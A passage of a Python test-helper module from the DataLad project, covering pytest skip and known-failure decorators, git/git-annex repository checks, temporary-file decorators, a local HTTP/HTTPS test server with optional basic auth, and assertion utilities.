check_and_raise()\n\n\ndef skip_if_on_windows(func=None):\n \"\"\"Skip test completely under Windows\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if on_windows:\n pytest.skip(\"Skipping on Windows\")\n\n if func:\n @wraps(func)\n @attr('skip_if_on_windows')\n def _wrap_skip_if_on_windows(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_on_windows\n else:\n check_and_raise()\n\n\ndef skip_if_root(func=None):\n \"\"\"Skip test if uid == 0.\n\n Note that on Windows (or anywhere else `os.geteuid` is not available) the\n test is _not_ skipped.\n \"\"\"\n check_not_generatorfunction(func)\n\n def check_and_raise():\n if hasattr(os, \"geteuid\") and os.geteuid() == 0:\n pytest.skip(\"Skipping: test assumptions fail under root\")\n\n if func:\n @wraps(func)\n @attr('skip_if_root')\n def _wrap_skip_if_root(*args, **kwargs):\n check_and_raise()\n return func(*args, **kwargs)\n return _wrap_skip_if_root\n else:\n check_and_raise()\n\n\n@optional_args\ndef skip_if(func, cond=True, msg=None, method='raise'):\n \"\"\"Skip test for specific condition\n\n Parameters\n ----------\n cond: bool\n condition on which to skip\n msg: str\n message to print if skipping\n method: str\n either 'raise' or 'pass'. 
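(A hedged usage sketch for the skip helpers above; the test names and the condition are invented, while the decorators and the import path are the ones from this module)::

    import os

    from datalad.tests.utils_pytest import (
        skip_if,
        skip_if_no_network,
        skip_if_on_windows,
    )

    @skip_if_no_network
    @skip_if_on_windows
    def test_needs_network_and_posix():
        ...  # runs only with network tests enabled and not on Windows

    @skip_if(cond=os.environ.get('CI') is not None, msg='flaky on CI')
    def test_skipped_on_ci():
        ...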
Whether to skip by raising `SkipTest` or by\n just proceeding and simply not calling the decorated function.\n This is particularly meant to be used, when decorating single assertions\n in a test with method='pass' in order to not skip the entire test, but\n just that assertion.\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n def _wrap_skip_if(*args, **kwargs):\n if cond:\n if method == 'raise':\n pytest.skip(msg if msg else \"condition was True\")\n elif method == 'pass':\n print(msg if msg else \"condition was True\")\n return\n return func(*args, **kwargs)\n return _wrap_skip_if\n\n\ndef skip_ssh(func):\n \"\"\"Skips SSH tests if on windows or if environment variable\n DATALAD_TESTS_SSH was not set\n \"\"\"\n\n check_not_generatorfunction(func)\n\n @wraps(func)\n @attr('skip_ssh')\n def _wrap_skip_ssh(*args, **kwargs):\n test_ssh = dl_cfg.get(\"datalad.tests.ssh\", '')\n if not test_ssh or test_ssh in ('0', 'false', 'no'):\n raise SkipTest(\"Run this test by setting DATALAD_TESTS_SSH\")\n return func(*args, **kwargs)\n return _wrap_skip_ssh\n\n\ndef skip_nomultiplex_ssh(func):\n \"\"\"Skips SSH tests if default connection/manager does not support multiplexing\n\n e.g. currently on windows or if set via datalad.ssh.multiplex-connections config variable\n \"\"\"\n\n check_not_generatorfunction(func)\n from ..support.sshconnector import (\n MultiplexSSHManager,\n SSHManager,\n )\n\n @wraps(func)\n @attr('skip_nomultiplex_ssh')\n @skip_ssh\n def _wrap_skip_nomultiplex_ssh(*args, **kwargs):\n if SSHManager is not MultiplexSSHManager:\n pytest.skip(\"SSH without multiplexing is used\")\n return func(*args, **kwargs)\n return _wrap_skip_nomultiplex_ssh\n\n#\n# Addition \"checkers\"\n#\n\nimport os\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import (\n AnnexRepo,\n FileNotInAnnexError,\n)\nfrom datalad.support.gitrepo import GitRepo\n\nfrom ..utils import (\n chpwd,\n getpwd,\n)\n\n\ndef ok_clean_git(path, annex=None, index_modified=[], untracked=[]):\n \"\"\"Obsolete test helper. 
Use assert_repo_status() instead.\n\n Still maps a few common cases to the new helper, to ease transition\n in extensions.\n \"\"\"\n kwargs = {}\n if index_modified:\n kwargs['modified'] = index_modified\n if untracked:\n kwargs['untracked'] = untracked\n assert_repo_status(\n path,\n annex=annex,\n **kwargs,\n )\n\n\ndef ok_file_under_git(path, filename=None, annexed=False):\n \"\"\"Test if file is present and under git/annex control\n\n If relative path provided, then test from current directory\n \"\"\"\n annex, file_repo_path, filename, path, repo = _prep_file_under_git(path, filename)\n assert_in(file_repo_path, repo.get_indexed_files()) # file is known to Git\n\n if annex:\n in_annex = 'key' in repo.get_file_annexinfo(file_repo_path)\n else:\n in_annex = False\n\n assert(annexed == in_annex)\n\n\ndef put_file_under_git(path, filename=None, content=None, annexed=False):\n \"\"\"Place file under git/annex and return used Repo\n \"\"\"\n annex, file_repo_path, filename, path, repo = _prep_file_under_git(path, filename)\n if content is None:\n content = \"\"\n with open(opj(repo.path, file_repo_path), 'w') as f_:\n f_.write(content)\n\n if annexed:\n if not isinstance(repo, AnnexRepo):\n repo = AnnexRepo(repo.path)\n repo.add(file_repo_path)\n else:\n repo.add(file_repo_path, git=True)\n repo.commit(_datalad_msg=True)\n ok_file_under_git(repo.path, file_repo_path, annexed)\n return repo\n\n\ndef _prep_file_under_git(path, filename):\n \"\"\"Get instance of the repository for the given filename\n\n Helper to be used by few functions\n \"\"\"\n path = Path(path)\n if filename is None:\n # path provides the path and the name\n filename = Path(path.name)\n path = path.parent\n else:\n filename = Path(filename)\n\n ds = Dataset(utils.get_dataset_root(path))\n\n return isinstance(ds.repo, AnnexRepo), \\\n str(path.absolute().relative_to(ds.path) / filename) \\\n if not filename.is_absolute() \\\n else str(filename.relative_to(ds.pathobj)), \\\n filename, \\\n str(path), \\\n ds.repo\n\n\ndef get_annexstatus(ds, paths=None):\n \"\"\"Report a status for annexed contents.\n Assembles states for git content info, amended with annex info on 'HEAD'\n (to get the last committed stage and with it possibly vanished content),\n and lastly annex info wrt to the present worktree, to also get info on\n added/staged content this fuses the info reported from\n - git ls-files\n - git annex findref HEAD\n - git annex find --include '*'\"\"\"\n info = ds.get_content_annexinfo(\n paths=paths,\n eval_availability=False,\n init=ds.get_content_annexinfo(\n paths=paths,\n ref='HEAD',\n eval_availability=False,\n init=ds.status(\n paths=paths,\n eval_submodule_state='full')\n )\n )\n ds._mark_content_availability(info)\n return info\n\n#\n# Helpers to test symlinks\n#\n\ndef ok_symlink(path):\n \"\"\"Checks whether path is either a working or broken symlink\"\"\"\n link_path = os.path.islink(path)\n if not link_path:\n raise AssertionError(\"Path {} seems not to be a symlink\".format(path))\n\n\ndef ok_good_symlink(path):\n ok_symlink(path)\n rpath = Path(path).resolve()\n ok_(rpath.exists(),\n msg=\"Path {} seems to be missing. Symlink {} is broken\".format(\n rpath, path))\n\n\ndef ok_broken_symlink(path):\n ok_symlink(path)\n rpath = Path(path).resolve()\n assert_false(rpath.exists(),\n msg=\"Path {} seems to be present. 
Symlink {} is not broken\".format(\n rpath, path))\n\n\ndef ok_startswith(s, prefix):\n ok_(s.startswith(prefix),\n msg=\"String %r doesn't start with %r\" % (s, prefix))\n\n\ndef ok_endswith(s, suffix):\n ok_(s.endswith(suffix),\n msg=\"String %r doesn't end with %r\" % (s, suffix))\n\n\ndef nok_startswith(s, prefix):\n assert_false(s.startswith(prefix),\n msg=\"String %r starts with %r\" % (s, prefix))\n\n\ndef ok_git_config_not_empty(ar):\n \"\"\"Helper to verify that nothing rewritten the config file\"\"\"\n # TODO: we don't support bare -- do we?\n assert_true(os.stat(opj(ar.path, '.git', 'config')).st_size)\n\n\ndef ok_annex_get(ar, files, network=True):\n \"\"\"Helper to run .get decorated checking for correct operation\n\n get passes through stderr from the ar to the user, which pollutes\n screen while running tests\n\n Note: Currently not true anymore, since usage of --json disables\n progressbars\n \"\"\"\n ok_git_config_not_empty(ar) # we should be working in already inited repo etc\n with swallow_outputs() as cmo:\n ar.get(files)\n # verify that load was fetched\n ok_git_config_not_empty(ar) # whatever we do shouldn't destroy the config file\n has_content = ar.file_has_content(files)\n if isinstance(has_content, bool):\n ok_(has_content)\n else:\n ok_(all(has_content))\n\n\ndef ok_generator(gen):\n assert_true(inspect.isgenerator(gen), msg=\"%s is not a generator\" % gen)\n\n\nassert_is_generator = ok_generator # just an alias\n\n\ndef ok_archives_caches(repopath, n=1, persistent=None):\n \"\"\"Given a path to repository verify number of archives\n\n Parameters\n ----------\n repopath : str\n Path to the repository\n n : int, optional\n Number of archives directories to expect\n persistent: bool or None, optional\n If None -- both persistent and not count.\n \"\"\"\n # looking into subdirectories\n glob_ptn = opj(repopath,\n ARCHIVES_TEMP_DIR + {None: '*', True: '', False: '-*'}[persistent],\n '*')\n dirs = glob.glob(glob_ptn)\n n2 = n * 2 # per each directory we should have a .stamp file\n assert_equal(len(dirs), n2,\n msg=\"Found following dirs when needed %d of them: %s\" % (n2, dirs))\n\n\ndef ok_exists(path):\n assert Path(path).exists(), 'path %s does not exist (or dangling symlink)' % path\n\n\ndef ok_file_has_content(path, content, strip=False, re_=False,\n decompress=False, **kwargs):\n \"\"\"Verify that file exists and has expected content\"\"\"\n path = Path(path)\n ok_exists(path)\n if decompress:\n if path.suffix == '.gz':\n open_func = gzip.open\n elif path.suffix in ('.xz', '.lzma'):\n open_func = lzma.open\n else:\n raise NotImplementedError(\"Don't know how to decompress %s\" % path)\n else:\n open_func = open\n\n with open_func(str(path), 'rb') as f:\n file_content = f.read()\n\n if isinstance(content, str):\n file_content = ensure_unicode(file_content)\n\n if os.linesep != '\\n':\n # for consistent comparisons etc. 
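(A hedged usage sketch for this helper; the file names and contents are invented, the keyword arguments are the ones in the signature above)::

    from datalad.tests.utils_pytest import ok_file_has_content

    ok_file_has_content('out.txt', 'hello world')              # exact match
    ok_file_has_content('out.txt', 'hello world', strip=True)  # ignore surrounding whitespace
    ok_file_has_content('report.txt', '^total: [0-9]+', re_=True)
    ok_file_has_content('log.txt.gz', 'all done', strip=True, decompress=True)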
Apparently when reading in `b` mode\n # on Windows we would also get \\r\n # https://github.com/datalad/datalad/pull/3049#issuecomment-444128715\n file_content = file_content.replace(os.linesep, '\\n')\n\n if strip:\n file_content = file_content.strip()\n\n if re_:\n assert_re_in(content, file_content, **kwargs)\n else:\n assert_equal(content, file_content, **kwargs)\n\n\n#\n# Decorators\n#\n\n\n@optional_args\ndef with_tree(t, tree=None, archives_leading_dir=True, delete=True, **tkwargs):\n\n @wraps(t)\n def _wrap_with_tree(*arg, **kw):\n if 'dir' not in tkwargs.keys():\n # if not specified otherwise, respect datalad.tests.temp.dir config\n # as this is a test helper\n tkwargs['dir'] = dl_cfg.get(\"datalad.tests.temp.dir\")\n tkwargs_ = get_tempfile_kwargs(tkwargs, prefix=\"tree\", wrapped=t)\n d = tempfile.mkdtemp(**tkwargs_)\n create_tree(d, tree, archives_leading_dir=archives_leading_dir)\n try:\n return t(*(arg + (d,)), **kw)\n finally:\n if delete:\n rmtemp(d)\n return _wrap_with_tree\n\n\nlgr = logging.getLogger('datalad.tests')\n\n\nclass SilentHTTPHandler(SimpleHTTPRequestHandler):\n \"\"\"A little adapter to silence the handler\n \"\"\"\n def __init__(self, *args, **kwargs):\n self._silent = lgr.getEffectiveLevel() > logging.DEBUG\n SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)\n\n def log_message(self, format, *args):\n if self._silent:\n return\n lgr.debug(\"HTTP: \" + format, *args)\n\n\ndef _multiproc_serve_path_via_http(\n hostname, path_to_serve_from, queue, use_ssl=False, auth=None): # pragma: no cover\n handler = SilentHTTPHandler\n if auth:\n # to-be-expected key for basic auth\n auth_test = (b'Basic ' + base64.b64encode(\n bytes('%s:%s' % auth, 'utf-8'))).decode('utf-8')\n\n # ad-hoc basic-auth handler\n class BasicAuthHandler(SilentHTTPHandler):\n def do_HEAD(self, authenticated):\n if authenticated:\n self.send_response(200)\n else:\n self.send_response(401)\n self.send_header(\n 'WWW-Authenticate', 'Basic realm=\\\"Protected\\\"')\n self.send_header('content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n if self.headers.get('Authorization') == auth_test:\n super().do_GET()\n else:\n self.do_HEAD(False)\n self.wfile.write(bytes('Auth failed', 'utf-8'))\n handler = BasicAuthHandler\n\n chpwd(path_to_serve_from)\n httpd = HTTPServer((hostname, 0), handler)\n if use_ssl:\n ca_dir = Path(__file__).parent / 'ca'\n ssl_key = ca_dir / 'certificate-key.pem'\n ssl_cert = ca_dir / 'certificate-pub.pem'\n if any(not p.exists for p in (ssl_key, ssl_cert)):\n raise RuntimeError(\n 'SSL requested, but no key/cert file combination can be '\n f'located under {ca_dir}')\n # turn on SSL\n context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n context.load_cert_chain(str(ssl_cert), str(ssl_key))\n httpd.socket = context.wrap_socket (\n httpd.socket,\n server_side=True)\n queue.put(httpd.server_port)\n httpd.serve_forever()\n\n\nclass HTTPPath(object):\n \"\"\"Serve the content of a path via an HTTP URL.\n\n This class can be used as a context manager, in which case it returns the\n URL.\n\n Alternatively, the `start` and `stop` methods can be called directly.\n\n Parameters\n ----------\n path : str\n Directory with content to serve.\n use_ssl : bool\n auth : tuple\n Username, password\n \"\"\"\n def __init__(self, path, use_ssl=False, auth=None):\n self.path = path\n self.url = None\n self._env_patch = None\n self._mproc = None\n self.use_ssl = use_ssl\n self.auth = auth\n\n def __enter__(self):\n self.start()\n return self.url\n\n def __exit__(self, *args):\n 
self.stop()\n\n def start(self):\n \"\"\"Start serving `path` via HTTP.\n \"\"\"\n # There is a problem with Haskell on wheezy trying to\n # fetch via IPv6 whenever there is a ::1 localhost entry in\n # /etc/hosts. Apparently fixing that docker image reliably\n # is not that straightforward, although see\n # http://jasonincode.com/customizing-hosts-file-in-docker/\n # so we just force to use 127.0.0.1 while on wheezy\n #hostname = '127.0.0.1' if on_debian_wheezy else 'localhost'\n if self.use_ssl:\n # we cannot use IPs with SSL certificates\n hostname = 'localhost'\n else:\n hostname = '127.0.0.1'\n\n queue = multiprocessing.Queue()\n self._mproc = multiprocessing.Process(\n target=_multiproc_serve_path_via_http,\n args=(hostname, self.path, queue),\n kwargs=dict(use_ssl=self.use_ssl, auth=self.auth))\n self._mproc.start()\n try:\n port = queue.get(timeout=300)\n except multiprocessing.queues.Empty as e:\n if self.use_ssl:\n pytest.skip('No working SSL support')\n else:\n raise\n self.url = 'http{}://{}:{}/'.format(\n 's' if self.use_ssl else '',\n hostname,\n port)\n lgr.debug(\"HTTP: serving %s under %s\", self.path, self.url)\n\n # Such tests don't require real network so if http_proxy settings were\n # provided, we remove them from the env for the duration of this run\n env = os.environ.copy()\n if self.use_ssl:\n env.pop('https_proxy', None)\n env['REQUESTS_CA_BUNDLE'] = str(\n Path(__file__).parent / 'ca' / 'ca_bundle.pem')\n else:\n env.pop('http_proxy', None)\n self._env_patch = patch.dict('os.environ', env, clear=True)\n self._env_patch.start()\n if self.use_ssl:\n # verify that the SSL/cert setup is functional, if not skip the\n # test\n # python-requests does its own thing re root CA trust\n # if this fails, check datalad/tests/ca/prov.sh for ca_bundle\n try:\n import requests\n from requests.auth import HTTPBasicAuth\n r = requests.get(\n self.url,\n verify=True,\n auth=HTTPBasicAuth(*self.auth) if self.auth else None)\n r.raise_for_status()\n # be robust and skip if anything goes wrong, rather than just a\n # particular SSL issue\n #except requests.exceptions.SSLError as e:\n except Exception as e:\n self.stop()\n pytest.skip('No working HTTPS setup')\n # now verify that the stdlib tooling also works\n # if this fails, check datalad/tests/ca/prov.sh\n # for info on deploying a datalad-root.crt\n from urllib.request import (\n Request,\n urlopen,\n )\n try:\n req = Request(self.url)\n if self.auth:\n req.add_header(\n \"Authorization\",\n b\"Basic \" + base64.standard_b64encode(\n '{0}:{1}'.format(*self.auth).encode('utf-8')))\n urlopen(req)\n # be robust and skip if anything goes wrong, rather than just a\n # particular SSL issue\n #except URLError as e:\n except Exception as e:\n self.stop()\n pytest.skip('No working HTTPS setup')\n\n def stop(self):\n \"\"\"Stop serving `path`.\n \"\"\"\n lgr.debug(\"HTTP: stopping server under %s\", self.path)\n self._env_patch.stop()\n self._mproc.terminate()\n\n\n@optional_args\ndef serve_path_via_http(tfunc, *targs, use_ssl=False, auth=None):\n \"\"\"Decorator which serves content of a directory via http url\n\n Parameters\n ----------\n path : str\n Directory with content to serve.\n use_ssl : bool\n Flag whether to set up SSL encryption and return a HTTPS\n URL. 
This require a valid certificate setup (which is tested\n for proper function) or it will cause a SkipTest to be raised.\n auth : tuple or None\n If a (username, password) tuple is given, the server access will\n be protected via HTTP basic auth.\n \"\"\"\n @wraps(tfunc)\n @attr('serve_path_via_http')\n def _wrap_serve_path_via_http(*args, **kwargs):\n\n if targs:\n # if a path is passed into serve_path_via_http, then it's in targs\n assert len(targs) == 1\n path = targs[0]\n\n elif len(args) > 1:\n args, path = args[:-1], args[-1]\n else:\n args, path = (), args[0]\n\n with HTTPPath(path, use_ssl=use_ssl, auth=auth) as url:\n return tfunc(*(args + (path, url)), **kwargs)\n return _wrap_serve_path_via_http\n\n\n@optional_args\ndef with_memory_keyring(t):\n \"\"\"Decorator to use non-persistent MemoryKeyring instance\n \"\"\"\n @wraps(t)\n @attr('with_memory_keyring')\n def _wrap_with_memory_keyring(*args, **kwargs):\n keyring = MemoryKeyring()\n with patch(\"datalad.downloaders.credentials.keyring_\", keyring):\n return t(*(args + (keyring,)), **kwargs)\n\n return _wrap_with_memory_keyring\n\n\n@optional_args\ndef without_http_proxy(tfunc):\n \"\"\"Decorator to remove http*_proxy env variables for the duration of the test\n \"\"\"\n\n @wraps(tfunc)\n @attr('without_http_proxy')\n def _wrap_without_http_proxy(*args, **kwargs):\n if on_windows:\n pytest.skip('Unclear why this is not working on windows')\n # Such tests don't require real network so if http_proxy settings were\n # provided, we remove them from the env for the duration of this run\n env = os.environ.copy()\n env.pop('http_proxy', None)\n env.pop('https_proxy', None)\n with patch.dict('os.environ', env, clear=True):\n return tfunc(*args, **kwargs)\n\n return _wrap_without_http_proxy\n\n\n@borrowkwargs(methodname=make_tempfile)\n@optional_args\ndef with_tempfile(t, **tkwargs):\n \"\"\"Decorator function to provide a temporary file name and remove it at the end\n\n Parameters\n ----------\n\n To change the used directory without providing keyword argument 'dir' set\n DATALAD_TESTS_TEMP_DIR.\n\n Examples\n --------\n\n ::\n\n @with_tempfile\n def test_write(tfile=None):\n open(tfile, 'w').write('silly test')\n \"\"\"\n\n @wraps(t)\n def _wrap_with_tempfile(*arg, **kw):\n if 'dir' not in tkwargs.keys():\n # if not specified otherwise, respect datalad.tests.temp.dir config\n # as this is a test helper\n tkwargs['dir'] = dl_cfg.get(\"datalad.tests.temp.dir\")\n with make_tempfile(wrapped=t, **tkwargs) as filename:\n return t(*(arg + (filename,)), **kw)\n\n return _wrap_with_tempfile\n\n\n# ### ###\n# START known failure decorators\n# ### ###\n\ndef probe_known_failure(func):\n \"\"\"Test decorator allowing the test to pass when it fails and vice versa\n\n Setting config datalad.tests.knownfailures.probe to True tests, whether or\n not the test is still failing. If it's not, an AssertionError is raised in\n order to indicate that the reason for failure seems to be gone.\n \"\"\"\n\n @wraps(func)\n @attr('probe_known_failure')\n def _wrap_probe_known_failure(*args, **kwargs):\n if dl_cfg.obtain(\"datalad.tests.knownfailures.probe\"):\n assert_raises(Exception, func, *args, **kwargs) # marked as known failure\n # Note: Since assert_raises lacks a `msg` argument, a comment\n # in the same line is helpful to determine what's going on whenever\n # this assertion fails and we see a trace back. 
Otherwise that line\n # wouldn't be very telling.\n else:\n return func(*args, **kwargs)\n return _wrap_probe_known_failure\n\n\n@optional_args\ndef skip_known_failure(func, method='raise'):\n \"\"\"Test decorator allowing to skip a test that is known to fail\n\n Setting config datalad.tests.knownfailures.skip to a bool enables/disables\n skipping.\n \"\"\"\n\n @skip_if(cond=dl_cfg.obtain(\"datalad.tests.knownfailures.skip\"),\n msg=\"Skip test known to fail\",\n method=method)\n @wraps(func)\n @attr('skip_known_failure')\n def _wrap_skip_known_failure(*args, **kwargs):\n return func(*args, **kwargs)\n return _wrap_skip_known_failure\n\n\ndef known_failure(func):\n \"\"\"Test decorator marking a test as known to fail\n\n This combines `probe_known_failure` and `skip_known_failure` giving the\n skipping precedence over the probing.\n \"\"\"\n\n @skip_known_failure\n @probe_known_failure\n @wraps(func)\n @attr('known_failure')\n def _wrap_known_failure(*args, **kwargs):\n return func(*args, **kwargs)\n return _wrap_known_failure\n\n\ndef known_failure_direct_mode(func):\n \"\"\"DEPRECATED. Stop using. Does nothing\n\n Test decorator marking a test as known to fail in a direct mode test run\n\n If datalad.repo.direct is set to True behaves like `known_failure`.\n Otherwise the original (undecorated) function is returned.\n \"\"\"\n # TODO: consider adopting nibabel/deprecated.py nibabel/deprecator.py\n # mechanism to consistently deprecate functionality and ensure they are\n # displayed.\n # Since 2.7 Deprecation warnings aren't displayed by default\n # and thus kinda pointless to issue a warning here, so we will just log\n msg = \"Direct mode support is deprecated, so no point in using \" \\\n \"@known_failure_direct_mode for %r since glorious future \" \\\n \"DataLad 0.12\" % func.__name__\n lgr.warning(msg)\n return func\n\n\ndef known_failure_windows(func):\n \"\"\"Test decorator marking a test as known to fail on windows\n\n On Windows behaves like `known_failure`.\n Otherwise the original (undecorated) function is returned.\n \"\"\"\n if on_windows:\n\n @known_failure\n @wraps(func)\n @attr('known_failure_windows')\n @attr('windows')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n return dm_func\n return func\n\n\ndef known_failure_githubci_win(func):\n \"\"\"Test decorator for a known test failure on Github's Windows CI\n \"\"\"\n if 'GITHUB_WORKFLOW' in os.environ and on_windows:\n @known_failure\n @wraps(func)\n @attr('known_failure_githubci_win')\n @attr('githubci_win')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\ndef known_failure_githubci_osx(func):\n \"\"\"Test decorator for a known test failure on Github's macOS CI\n \"\"\"\n if 'GITHUB_WORKFLOW' in os.environ and on_osx:\n @known_failure\n @wraps(func)\n @attr('known_failure_githubci_osx')\n @attr('githubci_osx')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\ndef known_failure_osx(func):\n \"\"\"Test decorator for a known test failure on macOS\n \"\"\"\n if on_osx:\n @known_failure\n @wraps(func)\n @attr('known_failure_osx')\n @attr('osx')\n def dm_func(*args, **kwargs):\n return func(*args, **kwargs)\n return dm_func\n return func\n\n\n# ### ###\n# xfails - like known failures but never to be checked to pass etc.\n# e.g. 
for specific versions of core tools with regressions\n# ### ###\n\n\nxfail_buggy_annex_info = pytest.mark.xfail(\n # 10.20230127 is lower bound since bug was introduced before next 10.20230214\n # release, and thus snapshot builds would fail. There were no release on\n # '10.20230221' - but that is the next day after the fix\n external_versions['cmd:annex'] and ('10.20230127' <= external_versions['cmd:annex'] < '10.20230221'),\n reason=\"Regression in git-annex info. https://github.com/datalad/datalad/issues/7286\"\n)\n\n\ndef _get_resolved_flavors(flavors):\n #flavors_ = (['local', 'clone'] + (['local-url'] if not on_windows else [])) \\\n # if flavors == 'auto' else flavors\n flavors_ = (['local', 'clone', 'local-url', 'network'] if not on_windows\n else ['network', 'network-clone']) \\\n if flavors == 'auto' else flavors\n\n if not isinstance(flavors_, list):\n flavors_ = [flavors_]\n\n if dl_cfg.get('datalad.tests.nonetwork'):\n flavors_ = [x for x in flavors_ if not x.startswith('network')]\n return flavors_\n\nlocal_testrepo_flavors = ['local'] # 'local-url'\n_TESTREPOS = None\n\n@optional_args\ndef with_sameas_remote(func, autoenabled=False):\n \"\"\"Provide a repository with a git-annex sameas remote configured.\n\n The repository will have two special remotes: r_dir (type=directory) and\n r_rsync (type=rsync). The rsync remote will be configured with\n --sameas=r_dir, and autoenabled if `autoenabled` is true.\n \"\"\"\n from datalad.support.annexrepo import AnnexRepo\n from datalad.support.exceptions import CommandError\n\n @wraps(func)\n @attr('with_sameas_remotes')\n @skip_if_on_windows\n @skip_ssh\n @with_tempfile(mkdir=True)\n @with_tempfile(mkdir=True)\n def _wrap_with_sameas_remote(*args, **kwargs):\n # With git-annex's 8.20200522-77-g1f2e2d15e, transferring from an rsync\n # special remote hangs on Xenial. This is likely due to an interaction\n # with an older rsync or openssh version. Use openssh as a rough\n # indicator. 
See\n # https://git-annex.branchable.com/bugs/Recent_hang_with_rsync_remote_with_older_systems___40__Xenial__44___Jessie__41__/\n if external_versions['cmd:system-ssh'] < '7.4' and \\\n '8.20200522' < external_versions['cmd:annex'] < '8.20200720':\n pytest.skip(\"Test known to hang\")\n\n # A fix in rsync 3.2.4 broke compatibility with older annex versions.\n # To make things a bit more complicated, ubuntu pulled that fix into\n # their rsync package for 3.1.3-8.\n # Issue: gh-7320\n rsync_ver = get_rsync_version()\n rsync_fixed = rsync_ver >= \"3.1.3-8ubuntu\" or rsync_ver >= \"3.2.4\"\n if rsync_fixed and external_versions['cmd:annex'] < \"10.20220504\":\n pytest.skip(f\"rsync {rsync_ver} and git-annex \"\n f\"{external_versions['cmd:annex']} incompatible\")\n\n sr_path, repo_path = args[-2:]\n fn_args = args[:-2]\n repo = AnnexRepo(repo_path)\n repo.init_remote(\"r_dir\",\n options=[\"type=directory\",\n \"encryption=none\",\n \"directory=\" + sr_path])\n options = [\"type=rsync\",\n \"rsyncurl=datalad-test:\" + sr_path]\n if autoenabled:\n options.append(\"autoenable=true\")\n options.append(\"--sameas=r_dir\")\n repo.init_remote(\"r_rsync\", options=options)\n return func(*(fn_args + (repo,)), **kwargs)\n return _wrap_with_sameas_remote\n\n\n@optional_args\ndef with_fake_cookies_db(func, cookies={}):\n \"\"\"mock original cookies db with a fake one for the duration of the test\n \"\"\"\n from ..support.cookies import cookies_db\n\n @wraps(func)\n @attr('with_fake_cookies_db')\n def _wrap_with_fake_cookies_db(*args, **kwargs):\n try:\n orig_cookies_db = cookies_db._cookies_db\n cookies_db._cookies_db = cookies.copy()\n return func(*args, **kwargs)\n finally:\n cookies_db._cookies_db = orig_cookies_db\n return _wrap_with_fake_cookies_db\n\n\n@optional_args\ndef assert_cwd_unchanged(func, ok_to_chdir=False):\n \"\"\"Decorator to test whether the current working directory remains unchanged\n\n Parameters\n ----------\n ok_to_chdir: bool, optional\n If True, allow to chdir, so this decorator would not then raise exception\n if chdir'ed but only return to original directory\n \"\"\"\n\n @wraps(func)\n def _wrap_assert_cwd_unchanged(*args, **kwargs):\n cwd_before = os.getcwd()\n pwd_before = getpwd()\n exc_info = None\n # record previous state of PWD handling\n utils_pwd_mode = utils._pwd_mode\n try:\n ret = func(*args, **kwargs)\n except:\n exc_info = sys.exc_info()\n finally:\n utils._pwd_mode = utils_pwd_mode\n try:\n cwd_after = os.getcwd()\n except OSError as e:\n lgr.warning(\"Failed to getcwd: %s\" % e)\n cwd_after = None\n\n if cwd_after != cwd_before:\n chpwd(pwd_before)\n # Above chpwd could also trigger the change of _pwd_mode, so we\n # would need to reset it again since we know that it is all kosher\n utils._pwd_mode = utils_pwd_mode\n if not ok_to_chdir:\n lgr.warning(\n \"%s changed cwd to %s. 
Mitigating and changing back to %s\"\n % (func, cwd_after, pwd_before))\n # If there was already exception raised, we better reraise\n # that one since it must be more important, so not masking it\n # here with our assertion\n if exc_info is None:\n assert_equal(cwd_before, cwd_after,\n \"CWD changed from %s to %s\" % (cwd_before, cwd_after))\n\n if exc_info is not None:\n raise exc_info[1]\n\n return ret\n\n return _wrap_assert_cwd_unchanged\n\n\n@optional_args\ndef run_under_dir(func, newdir='.'):\n \"\"\"Decorator to run tests under another directory\n\n It is somewhat ugly since we can't really chdir\n back to a directory which had a symlink in its path.\n So using this decorator has potential to move entire\n testing run under the dereferenced directory name -- sideeffect.\n\n The only way would be to instruct testing framework (i.e. nose\n in our case ATM) to run a test by creating a new process with\n a new cwd\n \"\"\"\n\n @wraps(func)\n def _wrap_run_under_dir(*args, **kwargs):\n pwd_before = getpwd()\n try:\n chpwd(newdir)\n func(*args, **kwargs)\n finally:\n chpwd(pwd_before)\n\n\n return _wrap_run_under_dir\n\n\ndef assert_re_in(regex, c, flags=0, match=True, msg=None):\n \"\"\"Assert that container (list, str, etc) contains entry matching the regex\n \"\"\"\n if not isinstance(c, (list, tuple)):\n c = [c]\n for e in c:\n if (re.match if match else re.search)(regex, e, flags=flags):\n return\n raise AssertionError(\n msg or \"Not a single entry matched %r in %r\" % (regex, c)\n )\n\n\ndef assert_dict_equal(d1, d2):\n msgs = []\n if set(d1).difference(d2):\n msgs.append(\" keys in the first dict but not in the second: %s\"\n % list(set(d1).difference(d2)))\n if set(d2).difference(d1):\n msgs.append(\" keys in the second dict but not in the first: %s\"\n % list(set(d2).difference(d1)))\n for k in set(d1).intersection(d2):\n same = True\n try:\n if isinstance(d1[k], str):\n # do not compare types for string types to avoid all the hassle\n # with the distinction of str and unicode in PY3, and simple\n # test for equality\n same = bool(d1[k] == d2[k])\n else:\n same = type(d1[k]) == type(d2[k]) and bool(d1[k] == d2[k])\n except: # if comparison or conversion to bool (e.g. 
with numpy arrays) fails\n same = False\n\n if not same:\n msgs.append(\" [%r] differs: %r != %r\" % (k, d1[k], d2[k]))\n\n if len(msgs) > 10:\n msgs.append(\"and more\")\n break\n if msgs:\n raise AssertionError(\"dicts differ:\\n%s\" % \"\\n\".join(msgs))\n # do generic comparison just in case we screwed up to detect difference correctly above\n eq_(d1, d2)\n\n\ndef assert_str_equal(s1, s2):\n \"\"\"Helper to compare two lines\"\"\"\n diff = list(unified_diff(s1.splitlines(), s2.splitlines()))\n assert not diff, '\\n'.join(diff)\n assert_equal(s1, s2)\n\n\ndef assert_status(label, results):\n \"\"\"Verify that each status dict in the results has a given status label\n\n `label` can be a sequence, in which case status must be one of the items\n in this sequence.\n \"\"\"\n label = ensure_list(label)\n results = ensure_result_list(results)\n if len(results) == 0:\n # If there are no results, an assertion about all results must fail.\n raise AssertionError(\"No results retrieved\")\n for i, r in enumerate(results):\n try:\n assert_in('status', r)\n assert_in(r['status'], label)\n except AssertionError:\n raise AssertionError('Test {}/{}: expected status {} not found 